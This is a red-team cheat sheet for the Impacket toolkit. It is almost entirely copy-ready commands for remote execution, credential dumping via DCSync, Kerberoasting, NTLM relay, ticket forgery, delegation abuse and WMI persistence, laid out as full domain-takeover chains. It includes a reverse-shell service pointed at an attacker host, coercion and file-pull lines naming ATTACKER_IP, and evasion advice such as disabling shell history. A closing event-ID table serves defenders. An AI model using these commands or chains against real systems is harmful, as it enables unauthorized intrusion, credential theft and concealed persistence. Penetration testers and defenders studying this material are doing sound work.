Impacket — Complete Red Team Cheat Sheet

⚙

Install & Syntax

Install on Kali

sudo apt install impacket-scripts python3-impacket

Install from GitHub (latest)

git clone https://github.com/fortra/impacket cd impacket && pip3 install . --break-system-packages

Kali Binary Names

impacket-secretsdump impacket-psexec impacket-wmiexec impacket-smbclient impacket-GetUserSPNs impacket-ntlmrelayx # or call directly: python3 /path/to/script.py

Universal Auth Syntax

# Password DOMAIN/user:password@TARGET # NTLM Hash DOMAIN/user@TARGET -hashes LM:NT DOMAIN/user@TARGET -hashes :NThashOnly # Kerberos (use ccache ticket) DOMAIN/user@TARGET -k -no-pass # AES Key DOMAIN/user@TARGET -aesKey AES256KEY -k # No password prompt DOMAIN/user@TARGET -no-pass

Ccache Ticket Usage

export KRB5CCNAME=/tmp/user.ccache impacket-psexec DOMAIN/user@TARGET -k -no-pass

📋

Complete Tool Reference Index

psexec.pySMB RCE shell (NOISY)

wmiexec.pyWMI semi-interactive shell

smbexec.pySMB bat-file exec (noisy)

dcomexec.pyDCOM shell (stealthy)

atexec.pyAT/Task Scheduler exec

secretsdump.pySAM/LSA/NTDS dump

ntlmrelayx.pyNTLM relay attacks

GetUserSPNs.pyKerberoasting

GetNPUsers.pyASREPRoasting

getTGT.pyRequest TGT ticket

getST.pyService ticket / S4U

ticketer.pyGolden/Silver tickets

ticketConverter.pykirbi ↔ ccache

findDelegation.pyDelegation enum

rbcd.pyRBCD attribute write

smbclient.pySMB file browser

lookupsid.pySID brute force / enum

samrdump.pySAMR user enum

GetADUsers.pyAD user enumeration

addcomputer.pyAdd machine account

mssqlclient.pyMSSQL shell

dpapi.pyDPAPI secret extraction

raiseChild.pyChild→Forest DA

goldenPac.pyMS14-068 PAC exploit

getPac.pyDump PAC of user

rpcdump.pyRPC endpoint dump

rdp_check.pyTest RDP credentials

Get-GPPPassword.pyGPP password extract

reg.pyRemote registry access

netview.pySession tracking

wmipersist.pyWMI persistence

smbserver.pyRogue SMB server

⚡

Remote Command Execution — All Methods

psexec.py — SMB/MSRPC (NOISY)

impacket-psexec DOMAIN/admin:Pass@TARGET impacket-psexec DOMAIN/admin@TARGET -hashes :NTLM impacket-psexec DOMAIN/admin@TARGET -k -no-pass # Opens SYSTEM shell. Drops RemComSvc on disk.

smbexec.py — Service-based (NOISY)

impacket-smbexec DOMAIN/admin:Pass@TARGET # No binary drop but creates/deletes a service # each command — logs event ID 7045

atexec.py — Task Scheduler

impacket-atexec DOMAIN/user:Pass@TARGET "whoami" impacket-atexec DOMAIN/user@TARGET -hashes :NTLM "cmd /c ipconfig"

wmiexec.py — WMI (Semi-interactive, Good OPSEC)

impacket-wmiexec DOMAIN/admin:Pass@TARGET impacket-wmiexec DOMAIN/admin@TARGET -hashes :NTLM impacket-wmiexec DOMAIN/admin@TARGET -k -no-pass # -nooutput: don't retrieve command output (stealthier) impacket-wmiexec DOMAIN/admin:Pass@TARGET -nooutput "net user hax /add" # -silentcommand: no output retrieval at all impacket-wmiexec DOMAIN/admin:Pass@TARGET -silentcommand "cmd /c ..." # PowerShell instead of cmd impacket-wmiexec DOMAIN/admin:Pass@TARGET -shell-type powershell

dcomexec.py — DCOM (Stealthiest)

impacket-dcomexec DOMAIN/admin:Pass@TARGET # Uses ShellWindows/MMC20 DCOM endpoint # No service creation, no file drop — best OPSEC impacket-dcomexec DOMAIN/admin:Pass@TARGET -object MMC20

Execution Method Noise Comparison

psexec

Drops binary, creates service, Event 7045 — AVOID on live engagements

smbexec

Creates/deletes service per command, cmd.exe child processes

atexec

Scheduled task created/deleted, task event logs

wmiexec

WMI process creation, writes output to ADMIN$ share

dcomexec

DCOM only, no disk write, stealthiest option

💀

secretsdump.py — Credential Dumping

Remote — DCSync (drsuapi — default)

impacket-secretsdump DOMAIN/admin:Pass@DC_IP impacket-secretsdump DOMAIN/admin@DC_IP -hashes :NTLM impacket-secretsdump DOMAIN/admin@DC_IP -k -no-pass

Remote — VSS Method (shadow copy)

impacket-secretsdump DOMAIN/admin:Pass@TARGET -use-vss # -exec-method: smbexec (default) | wmiexec | mmcexec impacket-secretsdump DOMAIN/admin:Pass@TARGET -use-vss -exec-method wmiexec

Remote — SAM + LSA only

impacket-secretsdump DOMAIN/admin:Pass@TARGET -just-dc impacket-secretsdump DOMAIN/admin:Pass@TARGET -just-dc-ntlm # NT hashes only

Single User DCSync

impacket-secretsdump DOMAIN/admin:Pass@DC_IP -just-dc-user krbtgt impacket-secretsdump DOMAIN/admin:Pass@DC_IP -just-dc-user Administrator

Dump with Extra Info

impacket-secretsdump DOMAIN/admin:Pass@DC_IP -pwd-last-set -user-status -history

Offline — SAM + SYSTEM hives

impacket-secretsdump -sam SAM -system SYSTEM LOCAL impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL

Offline — NTDS.dit

impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL impacket-secretsdump -ntds ntds.dit -system SYSTEM -outputfile hashes LOCAL

🚨 OPSEC: DCSync (drsuapi) is monitored by most SIEMs as Event 4662. Do DCSync from a DC-to-DC whenever possible. VSS writes a shadow copy to disk — noisier but harder to detect via DRSUAPI monitoring.

🎫

Kerberoasting & ASREPRoasting

Kerberoasting — GetUserSPNs.py

# List SPNs (no hash request) impacket-GetUserSPNs DOMAIN/user:Pass -dc-ip DC_IP # Request TGS hashes (hashcat -m 13100) impacket-GetUserSPNs DOMAIN/user:Pass -dc-ip DC_IP -request impacket-GetUserSPNs DOMAIN/user:Pass -dc-ip DC_IP -request -outputfile kerb.txt # With hash auth impacket-GetUserSPNs DOMAIN/user -hashes :NTLM -dc-ip DC_IP -request # With Kerberos impacket-GetUserSPNs DOMAIN/user -k -no-pass -dc-ip DC_IP -request

Crack (hashcat)

hashcat -m 13100 kerb.txt /usr/share/wordlists/rockyou.txt

ASREPRoasting — GetNPUsers.py

# List users w/ pre-auth disabled impacket-GetNPUsers DOMAIN/ -no-pass -dc-ip DC_IP -usersfile users.txt # With valid creds (enumerate + dump) impacket-GetNPUsers DOMAIN/user:Pass -dc-ip DC_IP -request impacket-GetNPUsers DOMAIN/user:Pass -dc-ip DC_IP -outputfile asrep.txt

Crack (hashcat)

hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

✓ OPSEC: Kerberoasting generates event 4769 (TGS-REQ). Request tickets over Kerberos (-k) rather than NTLM to blend with normal traffic. AES256 requests are less suspicious than RC4.

🎟

Ticket Operations

getTGT.py — Request TGT

impacket-getTGT DOMAIN/user:Pass impacket-getTGT DOMAIN/user -hashes :NTLM impacket-getTGT DOMAIN/user -aesKey AES256KEY export KRB5CCNAME=user.ccache

getST.py — Service Ticket / S4U2Proxy

# Basic ST request impacket-getST DOMAIN/user:Pass -spn cifs/server.domain.local # Impersonation via S4U (constrained delegation) impacket-getST DOMAIN/svcaccount:Pass \ -spn cifs/target.domain.local \ -impersonate Administrator # RBCD impersonation impacket-getST DOMAIN/'fakepc$':Pass \ -spn cifs/DC.domain.local \ -impersonate Administrator -dc-ip DC_IP

ticketConverter.py — kirbi ↔ ccache

impacket-ticketConverter admin.kirbi admin.ccache impacket-ticketConverter admin.ccache admin.kirbi

Golden Ticket — ticketer.py

impacket-ticketer -nthash KRBTGT_NTLM \ -domain-sid S-1-5-21-... \ -domain DOMAIN.LOCAL \ Administrator export KRB5CCNAME=Administrator.ccache

Silver Ticket — ticketer.py

impacket-ticketer -nthash SERVICE_ACCOUNT_NTLM \ -domain-sid S-1-5-21-... \ -domain DOMAIN.LOCAL \ -spn cifs/server.domain.local \ Administrator

🔀

ntlmrelayx.py — NTLM Relay Attacks

Setup — Generate Target List (with nxc)

nxc smb 192.168.1.0/24 --gen-relay-list relay.txt # Turn off SMB in Responder first! # Edit /etc/responder/Responder.conf → SMB = Off

Basic Relay → SAM Dump

impacket-ntlmrelayx -tf relay.txt -smb2support # Auto-dumps SAM on successful relay

Relay → Command Execution

impacket-ntlmrelayx -tf relay.txt -smb2support \ -c 'powershell -enc BASE64PAYLOAD'

Relay → SOCKS Proxy

impacket-ntlmrelayx -tf relay.txt -smb2support -socks # After relay: type "socks" in interactive prompt # Use proxychains → secretsdump/smbclient etc.

Relay to LDAP (add DA)

impacket-ntlmrelayx -t ldap://DC_IP -smb2support # Dump domain info via LDAP on relay impacket-ntlmrelayx -t ldaps://DC_IP -smb2support \ --escalate-user lowpriv_user

Relay → RBCD Attack (shadow cred / DA)

impacket-ntlmrelayx -t ldap://DC_IP -smb2support \ --delegate-access # Creates machine account + RBCD attribute

Relay with Responder / MiTM6

# Terminal 1: sudo responder -I eth0 -rdw # Terminal 2: impacket-ntlmrelayx -wh fakewpad.domain.local \ -tf relay.txt -smb2support -socks # Coerce with PetitPotam: impacket-petitpotam -d DOMAIN -u USER -p PASS \ ATTACKER_IP DC_IP

🚨 SMB signing must be DISABLED on target for relay. Verify with nxc SMB scan before attempting.

📂

SMB Tools

smbclient.py — File Access

impacket-smbclient DOMAIN/user:Pass@TARGET # Interactive commands: ls, cd, get, put, mget, rm, mkdir # Download a file: impacket-smbclient DOMAIN/user:Pass@TARGET -c 'get secret.txt'

smbserver.py — Host a Share

# Serve current dir as share "SHARE" impacket-smbserver SHARE $(pwd) -smb2support # With auth (avoids anonymous connection issues) impacket-smbserver SHARE $(pwd) -smb2support -username user -password pass # Target pulls: \\ATTACKER_IP\SHARE\file.exe

lookupsid.py — SID/User Enum

impacket-lookupsid DOMAIN/user:Pass@TARGET impacket-lookupsid DOMAIN/user:Pass@TARGET 1000 # max RID

samrdump.py — SAMR Enum

impacket-samrdump DOMAIN/user:Pass@TARGET

Get-GPPPassword.py

impacket-Get-GPPPassword DOMAIN/user:Pass@DC_IP

🔍

AD Enumeration

GetADUsers.py

impacket-GetADUsers DOMAIN/user:Pass -dc-ip DC_IP -all # Shows all users + email, lastLogon, pwdLastSet

findDelegation.py

impacket-findDelegation DOMAIN/user:Pass -dc-ip DC_IP # Lists unconstrained, constrained, RBCD impacket-findDelegation DOMAIN/user:Pass -dc-ip DC_IP -user svcaccount

rpcdump.py — RPC Endpoints

impacket-rpcdump @TARGET impacket-rpcdump DOMAIN/user:Pass@TARGET -port 135 # Check if EfsRpcOpenFileRaw present (PetitPotam)

rdp_check.py — Valid RDP Creds

impacket-rdp_check DOMAIN/user:Pass@TARGET

netview.py — Session Tracking

impacket-netview DOMAIN/user:Pass -dc-ip DC_IP -target SERVER

getArch.py — OS Architecture

impacket-getArch -target TARGET

🎭

Delegation Attacks & RBCD

Step 1 — Add Fake Computer Account

impacket-addcomputer DOMAIN/user:Pass -dc-ip DC_IP \ -computer-name 'fakepc$' -computer-pass 'FakePass123!'

Step 2 — Write RBCD Attribute

impacket-rbcd DOMAIN/user:Pass -dc-ip DC_IP \ -action write \ -delegate-to 'TARGET$' \ -delegate-from 'fakepc$' # Read RBCD attribute: impacket-rbcd DOMAIN/user:Pass -dc-ip DC_IP -action read -delegate-to 'TARGET$' # Clear RBCD attribute: impacket-rbcd DOMAIN/user:Pass -dc-ip DC_IP -action flush -delegate-to 'TARGET$'

Step 3 — Get Impersonation ST (S4U)

impacket-getST DOMAIN/'fakepc$':FakePass123! \ -spn cifs/TARGET.domain.local \ -impersonate Administrator \ -dc-ip DC_IP export KRB5CCNAME=Administrator.ccache

Step 4 — Use Ticket

impacket-secretsdump DOMAIN/Administrator@TARGET.domain.local \ -k -no-pass -dc-ip DC_IP

Constrained Delegation (S4U2Proxy)

impacket-getST DOMAIN/svcacct:Pass \ -spn cifs/fileserver.domain.local \ -impersonate Administrator -dc-ip DC_IP

🥇

Golden & Silver Tickets

Get Domain SID + krbtgt hash first

impacket-secretsdump DOMAIN/admin:Pass@DC_IP -just-dc-user krbtgt impacket-lookupsid DOMAIN/user:Pass@DC_IP # read Domain SID from output

Golden Ticket (any user, 10yr TTL)

impacket-ticketer \ -nthash KRBTGT_NTHASH \ -domain-sid S-1-5-21-XXXXXXXXX-XXXXXXXXX-XXXXXXXXX \ -domain DOMAIN.LOCAL \ Administrator export KRB5CCNAME=Administrator.ccache impacket-psexec DOMAIN/Administrator@DC_IP -k -no-pass

Silver Ticket (for specific SPN)

impacket-ticketer \ -nthash SERVICE_ACCOUNT_NTHASH \ -domain-sid S-1-5-21-... \ -domain DOMAIN.LOCAL \ -spn cifs/fileserver.domain.local \ Administrator export KRB5CCNAME=Administrator.ccache

🚨 OPSEC: Golden tickets never contact the DC (offline forgery). Silver tickets are stealthier — only need service account hash, never touch the DC for validation. Prefer silver tickets when possible.

🗄

mssqlclient.py — MSSQL Attacks

Connect & Auth

impacket-mssqlclient DOMAIN/user:Pass@TARGET impacket-mssqlclient DOMAIN/user:Pass@TARGET -windows-auth impacket-mssqlclient sa:Pass@TARGET # SQL auth impacket-mssqlclient DOMAIN/user@TARGET -hashes :NTLM -windows-auth

OS Command Execution (xp_cmdshell)

# Inside mssqlclient interactive shell: enable_xp_cmdshell xp_cmdshell whoami xp_cmdshell "powershell -enc BASE64" # Disable after use (OPSEC): disable_xp_cmdshell

Queries & Enumeration

SELECT name FROM master.dbo.sysdatabases; SELECT SYSTEM_USER; -- current user SELECT IS_SRVROLEMEMBER('sysadmin'); -- am I SA? EXEC sp_linkedservers; -- linked servers

File Read via BULK INSERT

BULK INSERT tmp FROM 'C:\Windows\win.ini' WITH (ROWTERMINATOR = '\n');

🔐

dpapi.py — DPAPI Secret Extraction

Decrypt DPAPI masterkey

impacket-dpapi masterkey \ -file MasterKey \ -sid S-1-5-21-... \ -password UserPassword

Decrypt DPAPI blob

impacket-dpapi credential \ -file CredFile \ -key MASTERKEY_HEX

Decrypt vault secrets

impacket-dpapi vault \ -vcrd vault.vcrd \ -vpol vault.vpol \ -key MASTERKEY_HEX

🗝

Registry, RPC & Misc Tools

reg.py — Remote Registry

impacket-reg DOMAIN/admin:Pass@TARGET query \ -keyName "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" impacket-reg DOMAIN/admin:Pass@TARGET add \ -keyName "HKLM\..." -v ValueName -vd Data

services.py — Service Manipulation

impacket-services DOMAIN/admin:Pass@TARGET list impacket-services DOMAIN/admin:Pass@TARGET start -name SvcName impacket-services DOMAIN/admin:Pass@TARGET stop -name SvcName impacket-services DOMAIN/admin:Pass@TARGET create \ -name Svc -display Name -path "C:\Windows\nc.exe -e cmd ATTACKER 4444"

wmipersist.py — WMI Persistence

impacket-wmipersist DOMAIN/admin:Pass@TARGET install \ -name PersistName \ -command "powershell -enc BASE64" \ -timer 60 impacket-wmipersist DOMAIN/admin:Pass@TARGET remove -name PersistName

⚠ CLEANUP: Always remove WMI subscriptions and created services after operations. wmipersist remove is critical — WMI subscriptions survive reboots.

👑

Domain Escalation & Trust Attacks

raiseChild.py — Child Domain → Forest DA

impacket-raiseChild -target-exec PARENT_DC_IP \ child.domain.local/admin:Pass # Abuses SID history + Extra SIDs on golden ticket # Compromises forest root from child DA

goldenPac.py — MS14-068 PAC Forgery

impacket-goldenPac DOMAIN/user:Pass@DC_FQDN # DC must be vulnerable (unpatched MS14-068) # Forge golden ticket without krbtgt hash!

getPac.py — Read User's PAC

impacket-getPac DOMAIN/user:Pass -targetUser admin

addcomputer.py — Machine Account Quota Abuse

# Any domain user can add computers if MAQ > 0 impacket-addcomputer DOMAIN/user:Pass \ -dc-ip DC_IP \ -computer-name 'attacker$' \ -computer-pass 'P@ssword123!' # Delete (cleanup): impacket-addcomputer DOMAIN/user:Pass -dc-ip DC_IP \ -computer-name 'attacker$' \ -delete

GetLAPSPassword.py

impacket-GetLAPSPassword DOMAIN/user:Pass -dc-ip DC_IP impacket-GetLAPSPassword DOMAIN/user:Pass \ -dc-ip DC_IP \ -computer TARGET_PC

⛓

Complete Attack Chains

Chain 1 — Kerberoast → DA

GetUserSPNs→ crack TGS→ secretsdump→ Domain Admin

impacket-GetUserSPNs DOMAIN/user:Pass -dc-ip DC_IP -request -outputfile kerb.txt hashcat -m 13100 kerb.txt rockyou.txt impacket-secretsdump DOMAIN/svcaccount:Cracked@DC_IP

Chain 2 — NTLM Relay → RBCD → DA

gen relay list→ ntlmrelayx --delegate-access→ getST impersonate→ DA

nxc smb 192.168.1.0/24 --gen-relay-list relay.txt impacket-ntlmrelayx -t ldap://DC_IP -smb2support --delegate-access # After relay: fake computer EVIL$ created, RBCD written impacket-getST DOMAIN/'EVIL$':Pass -spn cifs/TARGET -impersonate Administrator export KRB5CCNAME=Administrator.ccache impacket-secretsdump DOMAIN/Administrator@TARGET -k -no-pass

Chain 3 — ASREPRoast → PTH → DCSync

GetNPUsers (no creds)→ crack AS-REP→ secretsdump SAM→ DCSync

impacket-GetNPUsers DOMAIN/ -no-pass -usersfile users.txt -dc-ip DC_IP -outputfile asrep.txt hashcat -m 18200 asrep.txt rockyou.txt impacket-secretsdump DOMAIN/user:Cracked@TARGET # get admin hash impacket-secretsdump DOMAIN/admin@DC_IP -hashes :NTLM # DCSync

Chain 4 — Constrained Delegation Abuse

findDelegation→ getST S4U2Proxy→ use ticket→ Target Service

impacket-findDelegation DOMAIN/user:Pass -dc-ip DC_IP impacket-getTGT DOMAIN/svcaccount:Pass impacket-getST DOMAIN/svcaccount:Pass \ -spn cifs/fileserver.domain.local \ -impersonate Administrator -dc-ip DC_IP export KRB5CCNAME=Administrator.ccache impacket-smbclient DOMAIN/Administrator@fileserver.domain.local -k -no-pass

Chain 5 — Child Domain → Forest DA

Own child domain DA→ get child krbtgt + SID→ raiseChild.py→ Forest Root DA

impacket-secretsdump child.domain.local/admin:Pass@childDC -just-dc-user krbtgt impacket-raiseChild -target-exec PARENT_DC_IP \ child.domain.local/admin:Pass

Chain 6 — Golden Ticket Persistence

DCSync krbtgt→ ticketer.py→ export ccache→ Persistent DA

impacket-secretsdump DOMAIN/admin:Pass@DC_IP -just-dc-user krbtgt impacket-lookupsid DOMAIN/admin:Pass@DC_IP # get SID impacket-ticketer -nthash KRBTGT -domain-sid S-1-5-21-... \ -domain DOMAIN.LOCAL Administrator export KRB5CCNAME=Administrator.ccache impacket-psexec DOMAIN/Administrator@DC_IP -k -no-pass

🔴

OPSEC — Maintaining Stealth with Impacket

🔇 Noise Reduction — Core Principles

Execution Choice: psexec and smbexec are heavily signatured. Prefer dcomexec > wmiexec > atexec. If you must use wmiexec, add -nooutput or -silentcommand to avoid ADMIN$ share writes.

# AVOID (noisy, drops file, creates service): impacket-psexec DOMAIN/admin:Pass@TARGET # PREFER (WMI, no service, no disk write): impacket-wmiexec DOMAIN/admin:Pass@TARGET -nooutput "cmd /c ..." # BEST (DCOM, stealthiest): impacket-dcomexec DOMAIN/admin:Pass@TARGET

DCSync IOC: Event 4662 with DRSUAPI replication rights is a high-fidelity alert. Consider VSS+wmiexec method instead, or perform DCSync only against specific accounts (-just-dc-user).

# Instead of full NTDS dump: impacket-secretsdump DOMAIN/admin:Pass@DC_IP -just-dc-user krbtgt impacket-secretsdump DOMAIN/admin:Pass@DC_IP -just-dc-user Administrator # VSS method (shadow copy) - avoids DRSUAPI detection: impacket-secretsdump DOMAIN/admin:Pass@DC_IP -use-vss -exec-method wmiexec

Kerberoast IOC: Requesting RC4 (23) TGS from modern environments is suspicious — most systems upgraded to AES. Request AES256 tickets to blend in.

# Default requests RC4 — suspicious on modern AD # No direct AES-only flag in GetUserSPNs, but # use Kerberos auth (-k) to blend into normal traffic: impacket-GetUserSPNs DOMAIN/user:Pass -k -dc-ip DC_IP -request

Silver > Golden: Silver tickets never contact the DC. Golden tickets are forged offline but can be detected by EDR via ticket anomalies. Prefer silver tickets for specific lateral movement.

🌐 Infrastructure OPSEC

Proxychains: Route all Impacket traffic through SOCKS5 proxy obtained via ntlmrelayx or C2. Never run from C2 server IP directly.

proxychains impacket-secretsdump DOMAIN/admin:Pass@TARGET proxychains impacket-wmiexec DOMAIN/admin:Pass@TARGET

Separate Infrastructure: Run scans from different IPs than relays, which differ from command execution. Detection of one IP must not collapse entire operation.

🪵 Evidence & Cleanup

Clean Up After Yourself: Remove created accounts, services, WMI subscriptions, and scheduled tasks immediately after use.

# Remove machine account you created: impacket-addcomputer DOMAIN/user:Pass -dc-ip DC_IP \ -computer-name 'attacker$' -delete # Remove WMI persistence: impacket-wmipersist DOMAIN/admin:Pass@TARGET remove -name PersistName # Disable xp_cmdshell after MSSQL operations: disable_xp_cmdshell

⚙ Key OPSEC Pre-Flight

1. Check signing: verify SMB signing off before relay (nxc smb --gen-relay-list)

2. Time sync with DC before any Kerberos operations: sudo ntpdate DC_IP

3. Prefer -k -no-pass (ccache) over plaintext passwords in command history

4. Use -outputfile to save results to disk rather than terminal (avoids shell logging)

5. -just-dc-user for secretsdump rather than full dump when possible

6. Clear bash history: history -c; export HISTFILE=/dev/null

7. Set HISTFILE=/dev/null before running any impacket commands with creds in args

📌

Common Flag Reference

Flag	Description
-hashes LM:NT	NTLM hash auth (use :NT for NT only)
-k	Kerberos auth (use KRB5CCNAME)
-no-pass	Skip password prompt (use with -k)
-aesKey HEX	AES256/AES128 key for Kerberos
-dc-ip IP	Specify DC IP directly
-target-ip IP	Override target IP (hostname resolution)
-debug	Turn on debug output
-ts	Add timestamps to all logging
-outputfile F	Save results to file
-just-dc	Only dump DC secrets (secretsdump)
-just-dc-user U	Dump single user only
-use-vss	VSS method for NTDS dump
-nooutput	No output retrieval (wmiexec)
-silentcommand	Silent exec, no output (wmiexec)

👁

Windows Event IDs Generated by Impacket (Blue Team Awareness)

Event ID	Tool/Action	Description
4624	All tools	Successful logon (Type 3 = network)
4625	All tools	Failed logon attempt
4648	PTH/PTT	Logon using explicit credentials
4662	secretsdump DCSync	Object operation with replication rights — HIGH ALERT
4663	secretsdump VSS	Object access (NTDS.dit, registry hives)
4688	wmiexec/smbexec	Process creation (cmd.exe under WMI)
4698	atexec	Scheduled task created
4699	atexec	Scheduled task deleted
4769	GetUserSPNs	Kerberos TGS-REQ (Kerberoasting)
4768	GetNPUsers	Kerberos TGT-REQ without pre-auth
7045	psexec/smbexec	Service installed — IMMEDIATE ALERT
4776	All NTLM tools	NTLM authentication attempt
4674	rbcd/ACL changes	Operation attempted on privileged object

IMPACKET COMPLETE CHEAT SHEET + OPSEC GUIDE

IMPACKET _{COMPLETE CHEAT SHEET + OPSEC GUIDE}